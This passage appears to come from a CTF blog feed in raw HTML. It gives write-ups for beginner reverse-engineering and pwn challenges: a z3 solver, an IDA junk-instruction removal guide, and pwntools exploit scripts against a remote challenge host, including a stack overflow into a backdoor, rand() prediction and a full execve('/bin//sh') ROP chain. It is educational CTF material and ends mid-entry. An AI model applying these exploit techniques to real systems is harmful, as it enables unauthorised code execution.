<span class="hljs-number">517</span>, <span class="hljs-number">57</span>, <span class="hljs-number">575</span>, <span class="hljs-number">512</span>, <span class="hljs-number">1</span>, <span class="hljs-number">572</span>, <span class="hljs-number">515</span>, <span class="hljs-number">60</span>, <span class="hljs-number">18</span>, <span class="hljs-number">31</span>, <span class="hljs-number">1</span>,<br> <span class="hljs-number">594</span>, <span class="hljs-number">117</span>, <span class="hljs-number">15</span>]<br>l = <span class="hljs-built_in">len</span>(secret)<br>flag = [BitVec(<span class="hljs-string">'%d'</span> % i, <span class="hljs-number">12</span>) <span class="hljs-keyword">for</span> i <span class="hljs-keyword">in</span> <span class="hljs-built_in">range</span>(l)]<br>code = flag[:]<br><span class="hljs-keyword">for</span> i <span class="hljs-keyword">in</span> <span class="hljs-built_in">range</span>(<span class="hljs-number">52</span>):<br> code[i] = code[i + <span class="hljs-number">1</span>] ^ code[i + <span class="hljs-number">2</span>]<br>code[<span class="hljs-number">52</span>] = code[<span class="hljs-number">53</span>] ^ code[<span class="hljs-number">0</span>]<br>code[<span class="hljs-number">53</span>] = code[<span class="hljs-number">0</span>] ^ code[<span class="hljs-number">1</span>]<br><span class="hljs-keyword">for</span> i <span class="hljs-keyword">in</span> <span class="hljs-built_in">range</span>(l):<br> s.add(secret[i] == code[i])<br><br><br><span class="hljs-keyword">def</span> <span class="hljs-title function_">crack</span>(<span class="hljs-params">a, b</span>):<br> <span class="hljs-keyword">for</span> x <span class="hljs-keyword">in</span> <span class="hljs-built_in">range</span>(<span class="hljs-number">1</span>, <span class="hljs-number">128</span>):<br> <span class="hljs-keyword">if</span> ((x + b) % <span class="hljs-number">333</span> + <span class="hljs-number">444</span>) % <span 
class="hljs-number">555</span> - <span class="hljs-number">1</span> == a:<br> <span class="hljs-keyword">return</span> x<br> <span class="hljs-keyword">return</span> <span class="hljs-built_in">ord</span>(<span class="hljs-string">'f'</span>)<br><br><br><span class="hljs-keyword">if</span> s.check() == sat:<br> m = s.model()<br> <span class="hljs-built_in">print</span>(<span class="hljs-string">''</span>.join([<span class="hljs-built_in">chr</span>(crack(m[flag[i]].as_long(), i + <span class="hljs-number">1</span>)) <span class="hljs-keyword">for</span> i <span class="hljs-keyword">in</span> <span class="hljs-built_in">range</span>(l)]))<br></code></pre></td></tr></table></figure><blockquote><p>In this code, m is the model produced by the Solver; it holds the solution.</p><p>flag is a list of BitVecs representing the unknown variables.</p><p>m[1] looks up the key 1 in model m, but m has no integer key 1, so it raises an error.</p><p>m[flag[1]] looks up the key flag[1] in the model, i.e. the value of the second element of the flag list.</p><p>The flag list is initialised in the code as:</p><figure class="highlight python"><table><tr><td class="gutter"><pre><span class="line">1</span><br></pre></td><td class="code"><pre><code class="hljs python">flag = [BitVec(<span class="hljs-string">'[*]%d'</span> % i , <span class="hljs-number">12</span>) <span class="hljs-keyword">for</span> i <span class="hljs-keyword">in</span> <span class="hljs-built_in">range</span>(<span class="hljs-built_in">len</span>)]<br></code></pre></td></tr></table></figure><p>So flag[1] is BitVec('[*]1', 12), the second unknown variable.</p><p>Model m does contain that key, so the value for flag[1] prints correctly.</p><p>In summary:</p><p>m[1]: invalid access; model m has no integer key 1</p><p>m[flag[1]]: valid access; retrieves the second unknown from the model</p><p>So the two behave differently: one raises an error, the other prints the value.</p><p>The difference is that m[flag[1]] reaches a model key indirectly through the flag list, whereas m[1] uses the integer 1 directly as the key, and that key does not exist.</p></blockquote><h3 id="喵?喵。喵!"><a href="#喵?喵。喵!" 
class="headerlink" title="喵?喵。喵!"></a>喵?喵。喵!</h3><h1 id="PWN"><a href="#PWN" class="headerlink" title="PWN"></a>PWN</h1><h3 id="WEEK1-nc"><a href="#WEEK1-nc" class="headerlink" title="[WEEK1]nc"></a>[WEEK1]nc</h3><p>Just connect with nc and cat flag.</p><h3 id="WEEK1-四则计算器"><a href="#WEEK1-四则计算器" class="headerlink" title="[WEEK1] 四则计算器"></a>[WEEK1] 四则计算器 (four-function calculator)</h3><p>The length check uses strlen, which stops at the first NUL byte, so a payload that starts with \x00 passes the check while the whole buffer is still copied and overflows into the saved return address; overwrite it with the backdoor function.</p><figure class="highlight python"><table><tr><td class="gutter"><pre><span class="line">1</span><br><span class="line">2</span><br><span class="line">3</span><br><span class="line">4</span><br><span class="line">5</span><br><span class="line">6</span><br><span class="line">7</span><br><span class="line">8</span><br><span class="line">9</span><br><span class="line">10</span><br><span class="line">11</span><br><span class="line">12</span><br><span class="line">13</span><br><span class="line">14</span><br><span class="line">15</span><br><span class="line">16</span><br><span class="line">17</span><br><span class="line">18</span><br><span class="line">19</span><br><span class="line">20</span><br><span class="line">21</span><br><span class="line">22</span><br><span class="line">23</span><br><span class="line">24</span><br></pre></td><td class="code"><pre><code class="hljs python"><span class="hljs-keyword">from</span> pwn <span class="hljs-keyword">import</span> *<br><br>context(os=<span class="hljs-string">'linux'</span>, arch=<span class="hljs-string">'amd64'</span>, log_level=<span class="hljs-string">'debug'</span>)<br><br><span class="hljs-comment"># context.terminal = ['gnome-terminal', '-x', 'sh', '-c']</span><br><span class="hljs-comment"># p = gdb.debug('./ret2text')</span><br><span class="hljs-comment"># p = process('./ret2text')</span><br><br>p = remote(<span class="hljs-string">'112.6.51.212'</span>,<span class="hljs-number">32774</span>)<br><br><span class="hljs-keyword">def</span> <span class="hljs-title function_">debug</span>():<br> gdb.attach(p)<br> pause()<br><br><br>backdoor = p64(<span 
class="hljs-number">0x4015E1</span>)<br><br>pad = <span class="hljs-string">b'\x00'</span>*(<span class="hljs-number">0x32</span>+<span class="hljs-number">8</span>)<br><br>payload = pad + backdoor<br><br>p.sendlineafter(<span class="hljs-string">'>'</span>,payload)<br><br>p.interactive()<br></code></pre></td></tr></table></figure><h3 id="WEEK1-口算题"><a href="#WEEK1-口算题" class="headerlink" title="[WEEK1]口算题"></a>[WEEK1]口算题 (mental arithmetic)</h3><p>An interactive challenge. The expressions contain two non-ASCII Unicode operators (÷ and ×), so decode each line as UTF-8 and substitute them before evaluating (eval on server output is acceptable in a throwaway CTF script, nowhere else).</p><figure class="highlight python"><table><tr><td class="gutter"><pre><span class="line">1</span><br><span class="line">2</span><br><span class="line">3</span><br><span class="line">4</span><br><span class="line">5</span><br><span class="line">6</span><br><span class="line">7</span><br><span class="line">8</span><br><span class="line">9</span><br><span class="line">10</span><br><span class="line">11</span><br><span class="line">12</span><br><span class="line">13</span><br><span class="line">14</span><br><span class="line">15</span><br><span class="line">16</span><br><span class="line">17</span><br><span class="line">18</span><br><span class="line">19</span><br><span class="line">20</span><br><span class="line">21</span><br></pre></td><td class="code"><pre><code class="hljs python"><span class="hljs-keyword">from</span> pwn <span class="hljs-keyword">import</span> *<br><br>context(arch=<span class="hljs-string">'amd64'</span>, os=<span class="hljs-string">'linux'</span>)<br>context.log_level = <span class="hljs-string">'DEBUG'</span><br><br>p = remote(<span class="hljs-string">'112.6.51.212'</span>,<span class="hljs-number">30687</span>)<br>p.sendlineafter(<span class="hljs-string">b'start...'</span>, <span class="hljs-string">b''</span>)<br><br><span class="hljs-keyword">for</span> i <span class="hljs-keyword">in</span> <span class="hljs-built_in">range</span>(<span class="hljs-number">200</span>):<br> p.recvline()<br> a = p.recvline().decode(<span class="hljs-string">'utf-8'</span>)<br> a = 
a[<span class="hljs-number">0</span>:-<span class="hljs-number">3</span>]<br> a = a.replace(<span class="hljs-string">'÷'</span>, <span class="hljs-string">'/'</span>)<br> a = a.replace(<span class="hljs-string">'×'</span>, <span class="hljs-string">'*'</span>)<br> <span class="hljs-built_in">print</span>(a)<br> r = <span class="hljs-built_in">eval</span>(a)<br> p.sendline(<span class="hljs-built_in">str</span>(r))<br> p.recvline()<br><br>p.interactive()<br><br></code></pre></td></tr></table></figure><h3 id="WEEK1-猜数游戏"><a href="#WEEK1-猜数游戏" class="headerlink" title="[WEEK1]猜数游戏"></a>[WEEK1]猜数游戏 (guess the number)</h3><p>The classic guess-the-number: the binary seeds with srand(time(0)), so calling the same libc functions through ctypes reproduces its rand() output, as long as our clock and the server's agree to the second.</p><figure class="highlight python"><table><tr><td class="gutter"><pre><span class="line">1</span><br><span class="line">2</span><br><span class="line">3</span><br><span class="line">4</span><br><span class="line">5</span><br><span class="line">6</span><br><span class="line">7</span><br><span class="line">8</span><br><span class="line">9</span><br><span class="line">10</span><br><span class="line">11</span><br><span class="line">12</span><br><span class="line">13</span><br><span class="line">14</span><br><span class="line">15</span><br><span class="line">16</span><br><span class="line">17</span><br></pre></td><td class="code"><pre><code class="hljs python"><span class="hljs-keyword">from</span> pwn <span class="hljs-keyword">import</span> *<br><span class="hljs-keyword">from</span> ctypes <span class="hljs-keyword">import</span> * <br>dll = cdll.LoadLibrary(<span class="hljs-string">'libc.so.6'</span>)<br>context(os=<span class="hljs-string">'linux'</span>, arch=<span class="hljs-string">'amd64'</span>, log_level=<span class="hljs-string">'debug'</span>)<br>ip, port = <span class="hljs-string">'112.6.51.212:32778'</span>.split(<span class="hljs-string">':'</span>)<br>p = remote(ip ,port)<br><br>a = dll.srand(dll.time(<span class="hljs-number">0</span>))<br>b=dll.rand()<br><br><span class="hljs-comment"># p.recvuntil(b'number?')</span><br>p.sendlineafter(<span 
class="hljs-string">'number?'</span>,<span class="hljs-string">b'11'</span>)<br>p.sendline(<span class="hljs-built_in">str</span>(b))<br><span class="hljs-built_in">print</span>(b)<br><br>p.interactive()<br><br></code></pre></td></tr></table></figure><h3 id="WEEK1-hard-nc"><a href="#WEEK1-hard-nc" class="headerlink" title="[WEEK1]hard nc"></a>[WEEK1]hard nc</h3><p>gift2 contains a base64 string; decoding it yields the tail of the flag, 1f-97e6-030b53e67d83}:</p><blockquote><p>MWYtOTdlNi0wMzBiNTNlNjdkODN9Cg==</p></blockquote><p>ls -a reveals the hidden directory, then simply</p><blockquote><p>cd .gift  # don't forget the leading dot</p></blockquote><h3 id="WEEK1-ropchain"><a href="#WEEK1-ropchain" class="headerlink" title="[WEEK1]ropchain"></a>[WEEK1]ropchain</h3><p>The challenge states outright that it was built with ROPgadget in mind, so just go along with it and let the tool generate the execve chain (the binary is static, so all gadgets come from the executable itself):</p><blockquote><p>ROPgadget --binary chal --ropchain</p></blockquote><figure class="highlight python"><table><tr><td class="gutter"><pre><span class="line">1</span><br><span class="line">2</span><br><span class="line">3</span><br><span class="line">4</span><br><span class="line">5</span><br><span class="line">6</span><br><span class="line">7</span><br><span class="line">8</span><br><span class="line">9</span><br><span class="line">10</span><br><span class="line">11</span><br><span class="line">12</span><br><span class="line">13</span><br><span class="line">14</span><br><span class="line">15</span><br><span class="line">16</span><br><span class="line">17</span><br><span class="line">18</span><br><span class="line">19</span><br><span class="line">20</span><br><span class="line">21</span><br><span class="line">22</span><br><span class="line">23</span><br><span class="line">24</span><br><span class="line">25</span><br><span class="line">26</span><br><span class="line">27</span><br><span class="line">28</span><br><span class="line">29</span><br><span class="line">30</span><br><span class="line">31</span><br><span class="line">32</span><br><span class="line">33</span><br><span class="line">34</span><br><span class="line">35</span><br><span class="line">36</span><br><span class="line">37</span><br><span 
class="line">38</span><br><span class="line">39</span><br><span class="line">40</span><br><span class="line">41</span><br><span class="line">42</span><br><span class="line">43</span><br><span class="line">44</span><br><span class="line">45</span><br><span class="line">46</span><br><span class="line">47</span><br><span class="line">48</span><br><span class="line">49</span><br><span class="line">50</span><br><span class="line">51</span><br><span class="line">52</span><br><span class="line">53</span><br><span class="line">54</span><br><span class="line">55</span><br><span class="line">56</span><br><span class="line">57</span><br><span class="line">58</span><br><span class="line">59</span><br><span class="line">60</span><br><span class="line">61</span><br><span class="line">62</span><br><span class="line">63</span><br><span class="line">64</span><br><span class="line">65</span><br><span class="line">66</span><br><span class="line">67</span><br><span class="line">68</span><br><span class="line">69</span><br><span class="line">70</span><br><span class="line">71</span><br><span class="line">72</span><br><span class="line">73</span><br><span class="line">74</span><br><span class="line">75</span><br><span class="line">76</span><br><span class="line">77</span><br><span class="line">78</span><br><span class="line">79</span><br><span class="line">80</span><br><span class="line">81</span><br><span class="line">82</span><br><span class="line">83</span><br><span class="line">84</span><br><span class="line">85</span><br><span class="line">86</span><br><span class="line">87</span><br><span class="line">88</span><br><span class="line">89</span><br><span class="line">90</span><br><span class="line">91</span><br><span class="line">92</span><br><span class="line">93</span><br><span class="line">94</span><br><span class="line">95</span><br></pre></td><td class="code"><pre><code class="hljs python"><span class="hljs-keyword">from</span> pwn <span class="hljs-keyword">import</span> 
*<br><span class="hljs-keyword">from</span> struct <span class="hljs-keyword">import</span> pack<br><br>context.log_level = <span class="hljs-string">'debug'</span><br>context(arch=<span class="hljs-string">'amd64'</span>, os=<span class="hljs-string">'linux'</span>)<br><span class="hljs-comment"># p=process('chal')</span><br>pl=remote(<span class="hljs-string">'112.6.51.212'</span>,<span class="hljs-number">32783</span>)<br><span class="hljs-comment"># p=gdb.debug('./chal')</span><br><span class="hljs-comment"># p=remote("node3.buuoj.cn",28477)</span><br><span class="hljs-comment">#p=process('./wustctf2020_name_your_cat')</span><br><span class="hljs-comment"># elf=ELF('./wustctf2020_name_your_cat')</span><br><br><span class="hljs-comment"># Padding goes here</span><br>p = <span class="hljs-string">b'a'</span>*(<span class="hljs-number">0x20</span>+<span class="hljs-number">8</span>)<br><br>p += pack(<span class="hljs-string">'<Q'</span>, <span class="hljs-number">0x000000000040a30d</span>) <span class="hljs-comment"># pop rsi ; ret</span><br>p += pack(<span class="hljs-string">'<Q'</span>, <span class="hljs-number">0x000000000049d0c0</span>) <span class="hljs-comment"># @ .data</span><br>p += pack(<span class="hljs-string">'<Q'</span>, <span class="hljs-number">0x0000000000419a1c</span>) <span class="hljs-comment"># pop rax ; ret</span><br>p += <span class="hljs-string">b'/bin//sh'</span><br>p += pack(<span class="hljs-string">'<Q'</span>, <span class="hljs-number">0x000000000041ac41</span>) <span class="hljs-comment"># mov qword ptr [rsi], rax ; ret</span><br>p += pack(<span class="hljs-string">'<Q'</span>, <span class="hljs-number">0x000000000040a30d</span>) <span class="hljs-comment"># pop rsi ; ret</span><br>p += pack(<span class="hljs-string">'<Q'</span>, <span class="hljs-number">0x000000000049d0c8</span>) <span class="hljs-comment"># @ .data + 8</span><br>p += pack(<span class="hljs-string">'<Q'</span>, <span class="hljs-number">0x0000000000417e25</span>) 
<span class="hljs-comment"># xor rax, rax ; ret</span><br>p += pack(<span class="hljs-string">'<Q'</span>, <span class="hljs-number">0x000000000041ac41</span>) <span class="hljs-comment"># mov qword ptr [rsi], rax ; ret</span><br>p += pack(<span class="hljs-string">'<Q'</span>, <span class="hljs-number">0x0000000000401d1d</span>) <span class="hljs-comment"># pop rdi ; ret</span><br>p += pack(<span class="hljs-string">'<Q'</span>, <span class="hljs-number">0x000000000049d0c0</span>) <span class="hljs-comment"># @ .data</span><br>p += pack(<span class="hljs-string">'<Q'</span>, <span class="hljs-number">0x000000000040a30d</span>) <span class="hljs-comment"># pop rsi ; ret</span><br>p += pack(<span class="hljs-string">'<Q'</span>, <span class="hljs-number">0x000000000049d0c8</span>) <span class="hljs-comment"># @ .data + 8</span><br>p += pack(<span class="hljs-string">'<Q'</span>, <span class="hljs-number">0x0000000000401858</span>) <span class="hljs-comment"># pop rdx ; ret</span><br>p += pack(<span class="hljs-string">'<Q'</span>, <span class="hljs-number">0x000000000049d0c8</span>) <span class="hljs-comment"># @ .data + 8</span><br>p += pack(<span class="hljs-string">'<Q'</span>, <span class="hljs-number">0x0000000000417e25</span>) <span class="hljs-comment"># xor rax, rax ; ret</span><br>p += pack(<span class="hljs-string">'<Q'</span>, <span class="hljs-number">0x0000000000450860</span>) <span class="hljs-comment"># add rax, 1 ; ret</span><br>p += pack(<span class="hljs-string">'<Q'</span>, <span class="hljs-number">0x0000000000450860</span>) <span class="hljs-comment"># add rax, 1 ; ret</span><br>p += pack(<span class="hljs-string">'<Q'</span>, <span class="hljs-number">0x0000000000450860</span>) <span class="hljs-comment"># add rax, 1 ; ret</span><br>p += pack(<span class="hljs-string">'<Q'</span>, <span class="hljs-number">0x0000000000450860</span>) <span class="hljs-comment"># add rax, 1 ; ret</span><br>p += pack(<span class="hljs-string">'<Q'</span>, <span 
class="hljs-number">0x0000000000450860</span>) <span class="hljs-comment"># add rax, 1 ; ret</span><br>p += pack(<span class="hljs-string">'<Q'</span>, <span class="hljs-number">0x0000000000450860</span>) <span class="hljs-comment"># add rax, 1 ; ret</span><br>p += pack(<span class="hljs-string">'<Q'</span>, <span class="hljs-number">0x0000000000450860</span>) <span class="hljs-comment"># add rax, 1 ; ret</span><br>p += pack(<span class="hljs-string">'<Q'</span>, <span class="hljs-number">0x0000000000450860</span>) <span class="hljs-comment"># add rax, 1 ; ret</span><br>p += pack(<span class="hljs-string">'<Q'</span>, <span class="hljs-number">0x0000000000450860</span>) <span class="hljs-comment"># add rax, 1 ; ret</span><br>p += pack(<span class="hljs-string">'<Q'</span>, <span class="hljs-number">0x0000000000450860</span>) <span class="hljs-comment"># add rax, 1 ; ret</span><br>p += pack(<span class="hljs-string">'<Q'</span>, <span class="hljs-number">0x0000000000450860</span>) <span class="hljs-comment"># add rax, 1 ; ret</span><br>p += pack(<span class="hljs-string">'<Q'</span>, <span class="hljs-number">0x0000000000450860</span>) <span class="hljs-comment"># add rax, 1 ; ret</span><br>p += pack(<span class="hljs-string">'<Q'</span>, <span class="hljs-number">0x0000000000450860</span>) <span class="hljs-comment"># add rax, 1 ; ret</span><br>p += pack(<span class="hljs-string">'<Q'</span>, <span class="hljs-number">0x0000000000450860</span>) <span class="hljs-comment"># add rax, 1 ; ret</span><br>p += pack(<span class="hljs-string">'<Q'</span>, <span class="hljs-number">0x0000000000450860</span>) <span class="hljs-comment"># add rax, 1 ; ret</span><br>p += pack(<span class="hljs-string">'<Q'</span>, <span class="hljs-number">0x0000000000450860</span>) <span class="hljs-comment"># add rax, 1 ; ret</span><br>p += pack(<span class="hljs-string">'<Q'</span>, <span class="hljs-number">0x0000000000450860</span>) <span class="hljs-comment"># add rax, 1 ; 
ret</span><br>p += pack(<span class="hljs-string">'<Q'</span>, <span class="hljs-number">0x0000000000450860</span>) <span class="hljs-comment"># add rax, 1 ; ret</span><br>p += pack(<span class="hljs-string">'<Q'</span>, <span class="hljs-number">0x0000000000450860</span>) <span class="hljs-comment"># add rax, 1 ; ret</span><br>p += pack(<span class="hljs-string">'<Q'</span>, <span class="hljs-number">0x0000000000450860</span>) <span class="hljs-comment"># add rax, 1 ; ret</span><br>p += pack(<span class="hljs-string">'<Q'</span>, <span class="hljs-number">0x0000000000450860</span>) <span class="hljs-comment"># add rax, 1 ; ret</span><br>p += pack(<span class="hljs-string">'<Q'</span>, <span class="hljs-number">0x0000000000450860</span>) <span class="hljs-comment"># add rax, 1 ; ret</span><br>p += pack(<span class="hljs-string">'<Q'</span>, <span class="hljs-number">0x0000000000450860</span>) <span class="hljs-comment"># add rax, 1 ; ret</span><br>p += pack(<span class="hljs-string">'<Q'</span>, <span class="hljs-number">0x0000000000450860</span>) <span class="hljs-comment"># add rax, 1 ; ret</span><br>p += pack(<span class="hljs-string">'<Q'</span>, <span class="hljs-number">0x0000000000450860</span>) <span class="hljs-comment"># add rax, 1 ; ret</span><br>p += pack(<span class="hljs-string">'<Q'</span>, <span class="hljs-number">0x0000000000450860</span>) <span class="hljs-comment"># add rax, 1 ; ret</span><br>p += pack(<span class="hljs-string">'<Q'</span>, <span class="hljs-number">0x0000000000450860</span>) <span class="hljs-comment"># add rax, 1 ; ret</span><br>p += pack(<span class="hljs-string">'<Q'</span>, <span class="hljs-number">0x0000000000450860</span>) <span class="hljs-comment"># add rax, 1 ; ret</span><br>p += pack(<span class="hljs-string">'<Q'</span>, <span class="hljs-number">0x0000000000450860</span>) <span class="hljs-comment"># add rax, 1 ; ret</span><br>p += pack(<span class="hljs-string">'<Q'</span>, <span 
class="hljs-number">0x0000000000450860</span>) <span class="hljs-comment"># add rax, 1 ; ret</span><br>p += pack(<span class="hljs-string">'<Q'</span>, <span class="hljs-number">0x0000000000450860</span>) <span class="hljs-comment"># add rax, 1 ; ret</span><br>p += pack(<span class="hljs-string">'<Q'</span>, <span class="hljs-number">0x0000000000450860</span>) <span class="hljs-comment"># add rax, 1 ; ret</span><br>p += pack(<span class="hljs-string">'<Q'</span>, <span class="hljs-number">0x0000000000450860</span>) <span class="hljs-comment"># add rax, 1 ; ret</span><br>p += pack(<span class="hljs-string">'<Q'</span>, <span class="hljs-number">0x0000000000450860</span>) <span class="hljs-comment"># add rax, 1 ; ret</span><br>p += pack(<span class="hljs-string">'<Q'</span>, <span class="hljs-number">0x0000000000450860</span>) <span class="hljs-comment"># add rax, 1 ; ret</span><br>p += pack(<span class="hljs-string">'<Q'</span>, <span class="hljs-number">0x0000000000450860</span>) <span class="hljs-comment"># add rax, 1 ; ret</span><br>p += pack(<span class="hljs-string">'<Q'</span>, <span class="hljs-number">0x0000000000450860</span>) <span class="hljs-comment"># add rax, 1 ; ret</span><br>p += pack(<span class="hljs-string">'<Q'</span>, <span class="hljs-number">0x0000000000450860</span>) <span class="hljs-comment"># add rax, 1 ; ret</span><br>p += pack(<span class="hljs-string">'<Q'</span>, <span class="hljs-number">0x0000000000450860</span>) <span class="hljs-comment"># add rax, 1 ; ret</span><br>p += pack(<span class="hljs-string">'<Q'</span>, <span class="hljs-number">0x0000000000450860</span>) <span class="hljs-comment"># add rax, 1 ; ret</span><br>p += pack(<span class="hljs-string">'<Q'</span>, <span class="hljs-number">0x0000000000450860</span>) <span class="hljs-comment"># add rax, 1 ; ret</span><br>p += pack(<span class="hljs-string">'<Q'</span>, <span class="hljs-number">0x0000000000450860</span>) <span class="hljs-comment"># add rax, 1 ; 
ret</span><br>p += pack(<span class="hljs-string">'<Q'</span>, <span class="hljs-number">0x0000000000450860</span>) <span class="hljs-comment"># add rax, 1 ; ret</span><br>p += pack(<span class="hljs-string">'<Q'</span>, <span class="hljs-number">0x0000000000450860</span>) <span class="hljs-comment"># add rax, 1 ; ret</span><br>p += pack(<span class="hljs-string">'<Q'</span>, <span class="hljs-number">0x0000000000450860</span>) <span class="hljs-comment"># add rax, 1 ; ret</span><br>p += pack(<span class="hljs-string">'<Q'</span>, <span class="hljs-number">0x0000000000450860</span>) <span class="hljs-comment"># add rax, 1 ; ret</span><br>p += pack(<span class="hljs-string">'<Q'</span>, <span class="hljs-number">0x0000000000450860</span>) <span class="hljs-comment"># add rax, 1 ; ret</span><br>p += pack(<span class="hljs-string">'<Q'</span>, <span class="hljs-number">0x0000000000450860</span>) <span class="hljs-comment"># add rax, 1 ; ret</span><br>p += pack(<span class="hljs-string">'<Q'</span>, <span class="hljs-number">0x0000000000450860</span>) <span class="hljs-comment"># add rax, 1 ; ret</span><br>p += pack(<span class="hljs-string">'<Q'</span>, <span class="hljs-number">0x0000000000450860</span>) <span class="hljs-comment"># add rax, 1 ; ret</span><br>p += pack(<span class="hljs-string">'<Q'</span>, <span class="hljs-number">0x0000000000450860</span>) <span class="hljs-comment"># add rax, 1 ; ret</span><br>p += pack(<span class="hljs-string">'<Q'</span>, <span class="hljs-number">0x0000000000450860</span>) <span class="hljs-comment"># add rax, 1 ; ret</span><br>p += pack(<span class="hljs-string">'<Q'</span>, <span class="hljs-number">0x0000000000450860</span>) <span class="hljs-comment"># add rax, 1 ; ret</span><br>p += pack(<span class="hljs-string">'<Q'</span>, <span class="hljs-number">0x0000000000450860</span>) <span class="hljs-comment"># add rax, 1 ; ret</span><br>p += pack(<span class="hljs-string">'<Q'</span>, <span 
class="hljs-number">0x0000000000450860</span>) <span class="hljs-comment"># add rax, 1 ; ret</span><br>p += pack(<span class="hljs-string">'<Q'</span>, <span class="hljs-number">0x0000000000450860</span>) <span class="hljs-comment"># add rax, 1 ; ret</span><br>p += pack(<span class="hljs-string">'<Q'</span>, <span class="hljs-number">0x0000000000450860</span>) <span class="hljs-comment"># add rax, 1 ; ret</span><br>p += pack(<span class="hljs-string">'<Q'</span>, <span class="hljs-number">0x0000000000450860</span>) <span class="hljs-comment"># add rax, 1 ; ret</span><br>p += pack(<span class="hljs-string">'<Q'</span>, <span class="hljs-number">0x0000000000450860</span>) <span class="hljs-comment"># add rax, 1 ; ret</span><br>p += pack(<span class="hljs-string">'<Q'</span>, <span class="hljs-number">0x0000000000401243</span>) <span class="hljs-comment"># syscall</span><br><br>pl.sendline(p)<br><br>pl.interactive()<br></code></pre></td></tr></table></figure><h3 id="WEEK1-babystack"><a href="#WEEK1-babystack" class="headerlink" title="[WEEK1]babystack"></a>[WEEK1]babystack</h3>]]></content>
<summary type="html"><h2 id="RE"><a href="#RE" class="headerlink" title="RE"></a>RE</h2><h3 id="WEEK1-ez-asm"><a href="#WEEK1-ez-asm" class="headerlink" title="[WEEK1]ez_asm"></a>[WEEK1]ez_asm</h3><p>Simple asm code; just reverse it by following the logic step by step.</p>
<figure class="highlight python"><table><tr><td class="gutter"><pre><span class="line">1</span><br><span class="line">2</span><br><span class="line">3</span><br><span class="line">4</span><br><span class="line">5</span><br><span class="line">6</span><br><span class="line">7</span><br><span class="line">8</span><br><span class="line">9</span><br><span class="line">10</span><br><span class="line">11</span><br><span class="line">12</span><br><span class="line">13</span><br><span class="line">14</span><br><span class="line">15</span><br></pre></td><td class="code"><pre><code class="hljs python">flag = <span class="hljs-string">&quot;nhuo[M`7mc7uhc$7midgbTf`7`$7%#ubf7 ci5Y&quot;</span> <br><br><span class="hljs-keyword">for</span> i <span class="hljs-keyword">in</span> <span class="hljs-built_in">range</span>(<span class="hljs-built_in">len</span>(flag)):<br> <br> c = flag[i] <br> c = <span class="hljs-built_in">ord</span>(c)+<span class="hljs-number">0xA</span><br> flag = flag[:i] + <span class="hljs-built_in">chr</span>(c) + flag[i+<span class="hljs-number">1</span>:]<br><br> c = flag[i]<br> c = <span class="hljs-built_in">ord</span>(c)^<span class="hljs-number">0x1E</span><br> flag = flag[:i] + <span class="hljs-built_in">chr</span>(c) + flag[i+<span class="hljs-number">1</span>:]<br><br><br><br><span class="hljs-built_in">print</span>(flag)<br></code></pre></td></tr></table></figure></summary>
</entry>
<entry>
<title>re做题记录</title>
<link href="https://shenshuoyaoyouguangha.github.io/2023/09/23/re%E5%81%9A%E9%A2%98%E8%AE%B0%E5%BD%95/"/>
<id>https://shenshuoyaoyouguangha.github.io/2023/09/23/re%E5%81%9A%E9%A2%98%E8%AE%B0%E5%BD%95/</id>
<published>2023-09-23T07:26:20.000Z</published>
<updated>2023-12-18T05:33:25.767Z</updated>
<content type="html"><![CDATA[<h1 id="花指令"><a href="#花指令" class="headerlink" title="Junk instructions"></a>Junk instructions</h1><p><a href="https://blog.csdn.net/Captain_RB/article/details/123858864">Summary of junk instructions - Captain_RB's blog - CSDN Blog</a></p><h2 id="NSSRound-3-Team-jump-by-jump"><a href="#NSSRound-3-Team-jump-by-jump" class="headerlink" title="[NSSRound#3 Team]jump_by_jump"></a>[NSSRound#3 Team]jump_by_jump</h2><p>[<a href="https://www.nssctf.cn/problem/2313">NSSRound#3 Team]jump_by_jump | NSSCTF</a></p><p>The reason I am recording this challenge is that it contains junk instructions, the simplest kind.</p><p>First we open it in IDA. We can see that main calls a flag function, but it is not shown; switching to the disassembly view reveals junk instructions that stop it from being decompiled.</p><p><img src="https://cdn.statically.io/gh/shenshuoyaoyouguangha/blogimg@main/image.l5jcce610eo.webp"></p><p>Its characteristics point to the multi-byte-instruction trick. At 41188C (the call, jmp or similar jump instruction), press D to convert it to data and NOP out the E8.</p><p><img src="https://cdn.statically.io/gh/shenshuoyaoyouguangha/blogimg@main/image.6qkaosh9hjk0.webp"></p><p>At the same time we notice that a lot of code has turned yellow; press C on each of these yellow regions to turn them back into code. Finally, select all of the code, press D to convert it to data, press C to convert it to code, and press P to rebuild it as a function. That removes this simplest class of junk instruction, and inside the function we find the flag.</p><p><img src="https://cdn.statically.io/gh/shenshuoyaoyouguangha/blogimg@main/image.3x3dpjarkq60.webp"></p><span id="more"></span> <h2 id="HNCTF-2022-WEEK2-e-sy-flower"><a href="#HNCTF-2022-WEEK2-e-sy-flower" class="headerlink" title="[HNCTF 2022 WEEK2]e@sy_flower"></a>[HNCTF 2022 WEEK2]e@sy_flower</h2><p>A second simple junk-instruction removal challenge.</p><p>After locating main, we find the spot with the junk instruction.</p><p><img src="https://cdn.statically.io/gh/shenshuoyaoyouguangha/blogimg@main/image.44rklresz740.webp"></p><p>Here we have found where the junk instruction is; right-click and choose Patching -> Change byte.</p><p><img src="https://cdn.statically.io/gh/shenshuoyaoyouguangha/blogimg@main/image.50qing3en4o0.webp"></p><p>Change E9 -> 90, that is, NOP out the E9, then press P on main to rebuild the function.</p><p><img src="https://cdn.statically.io/gh/shenshuoyaoyouguangha/blogimg@main/image.4saybtma0gs0.webp"></p><figure class="highlight c"><table><tr><td class="gutter"><pre><span class="line">1</span><br><span class="line">2</span><br><span class="line">3</span><br><span class="line">4</span><br><span class="line">5</span><br><span class="line">6</span><br><span 
class="line">7</span><br><span class="line">8</span><br><span class="line">9</span><br><span class="line">10</span><br><span class="line">11</span><br><span class="line">12</span><br><span class="line">13</span><br><span class="line">14</span><br><span class="line">15</span><br><span class="line">16</span><br><span class="line">17</span><br><span class="line">18</span><br><span class="line">19</span><br><span class="line">20</span><br><span class="line">21</span><br><span class="line">22</span><br><span class="line">23</span><br><span class="line">24</span><br><span class="line">25</span><br><span class="line">26</span><br><span class="line">27</span><br><span class="line">28</span><br><span class="line">29</span><br><span class="line">30</span><br><span class="line">31</span><br><span class="line">32</span><br><span class="line">33</span><br></pre></td><td class="code"><pre><code class="hljs c"><span class="hljs-type">int</span> __cdecl __noreturn <span class="hljs-title function_">main</span><span class="hljs-params">(<span class="hljs-type">int</span> argc, <span class="hljs-type">const</span> <span class="hljs-type">char</span> **argv, <span class="hljs-type">const</span> 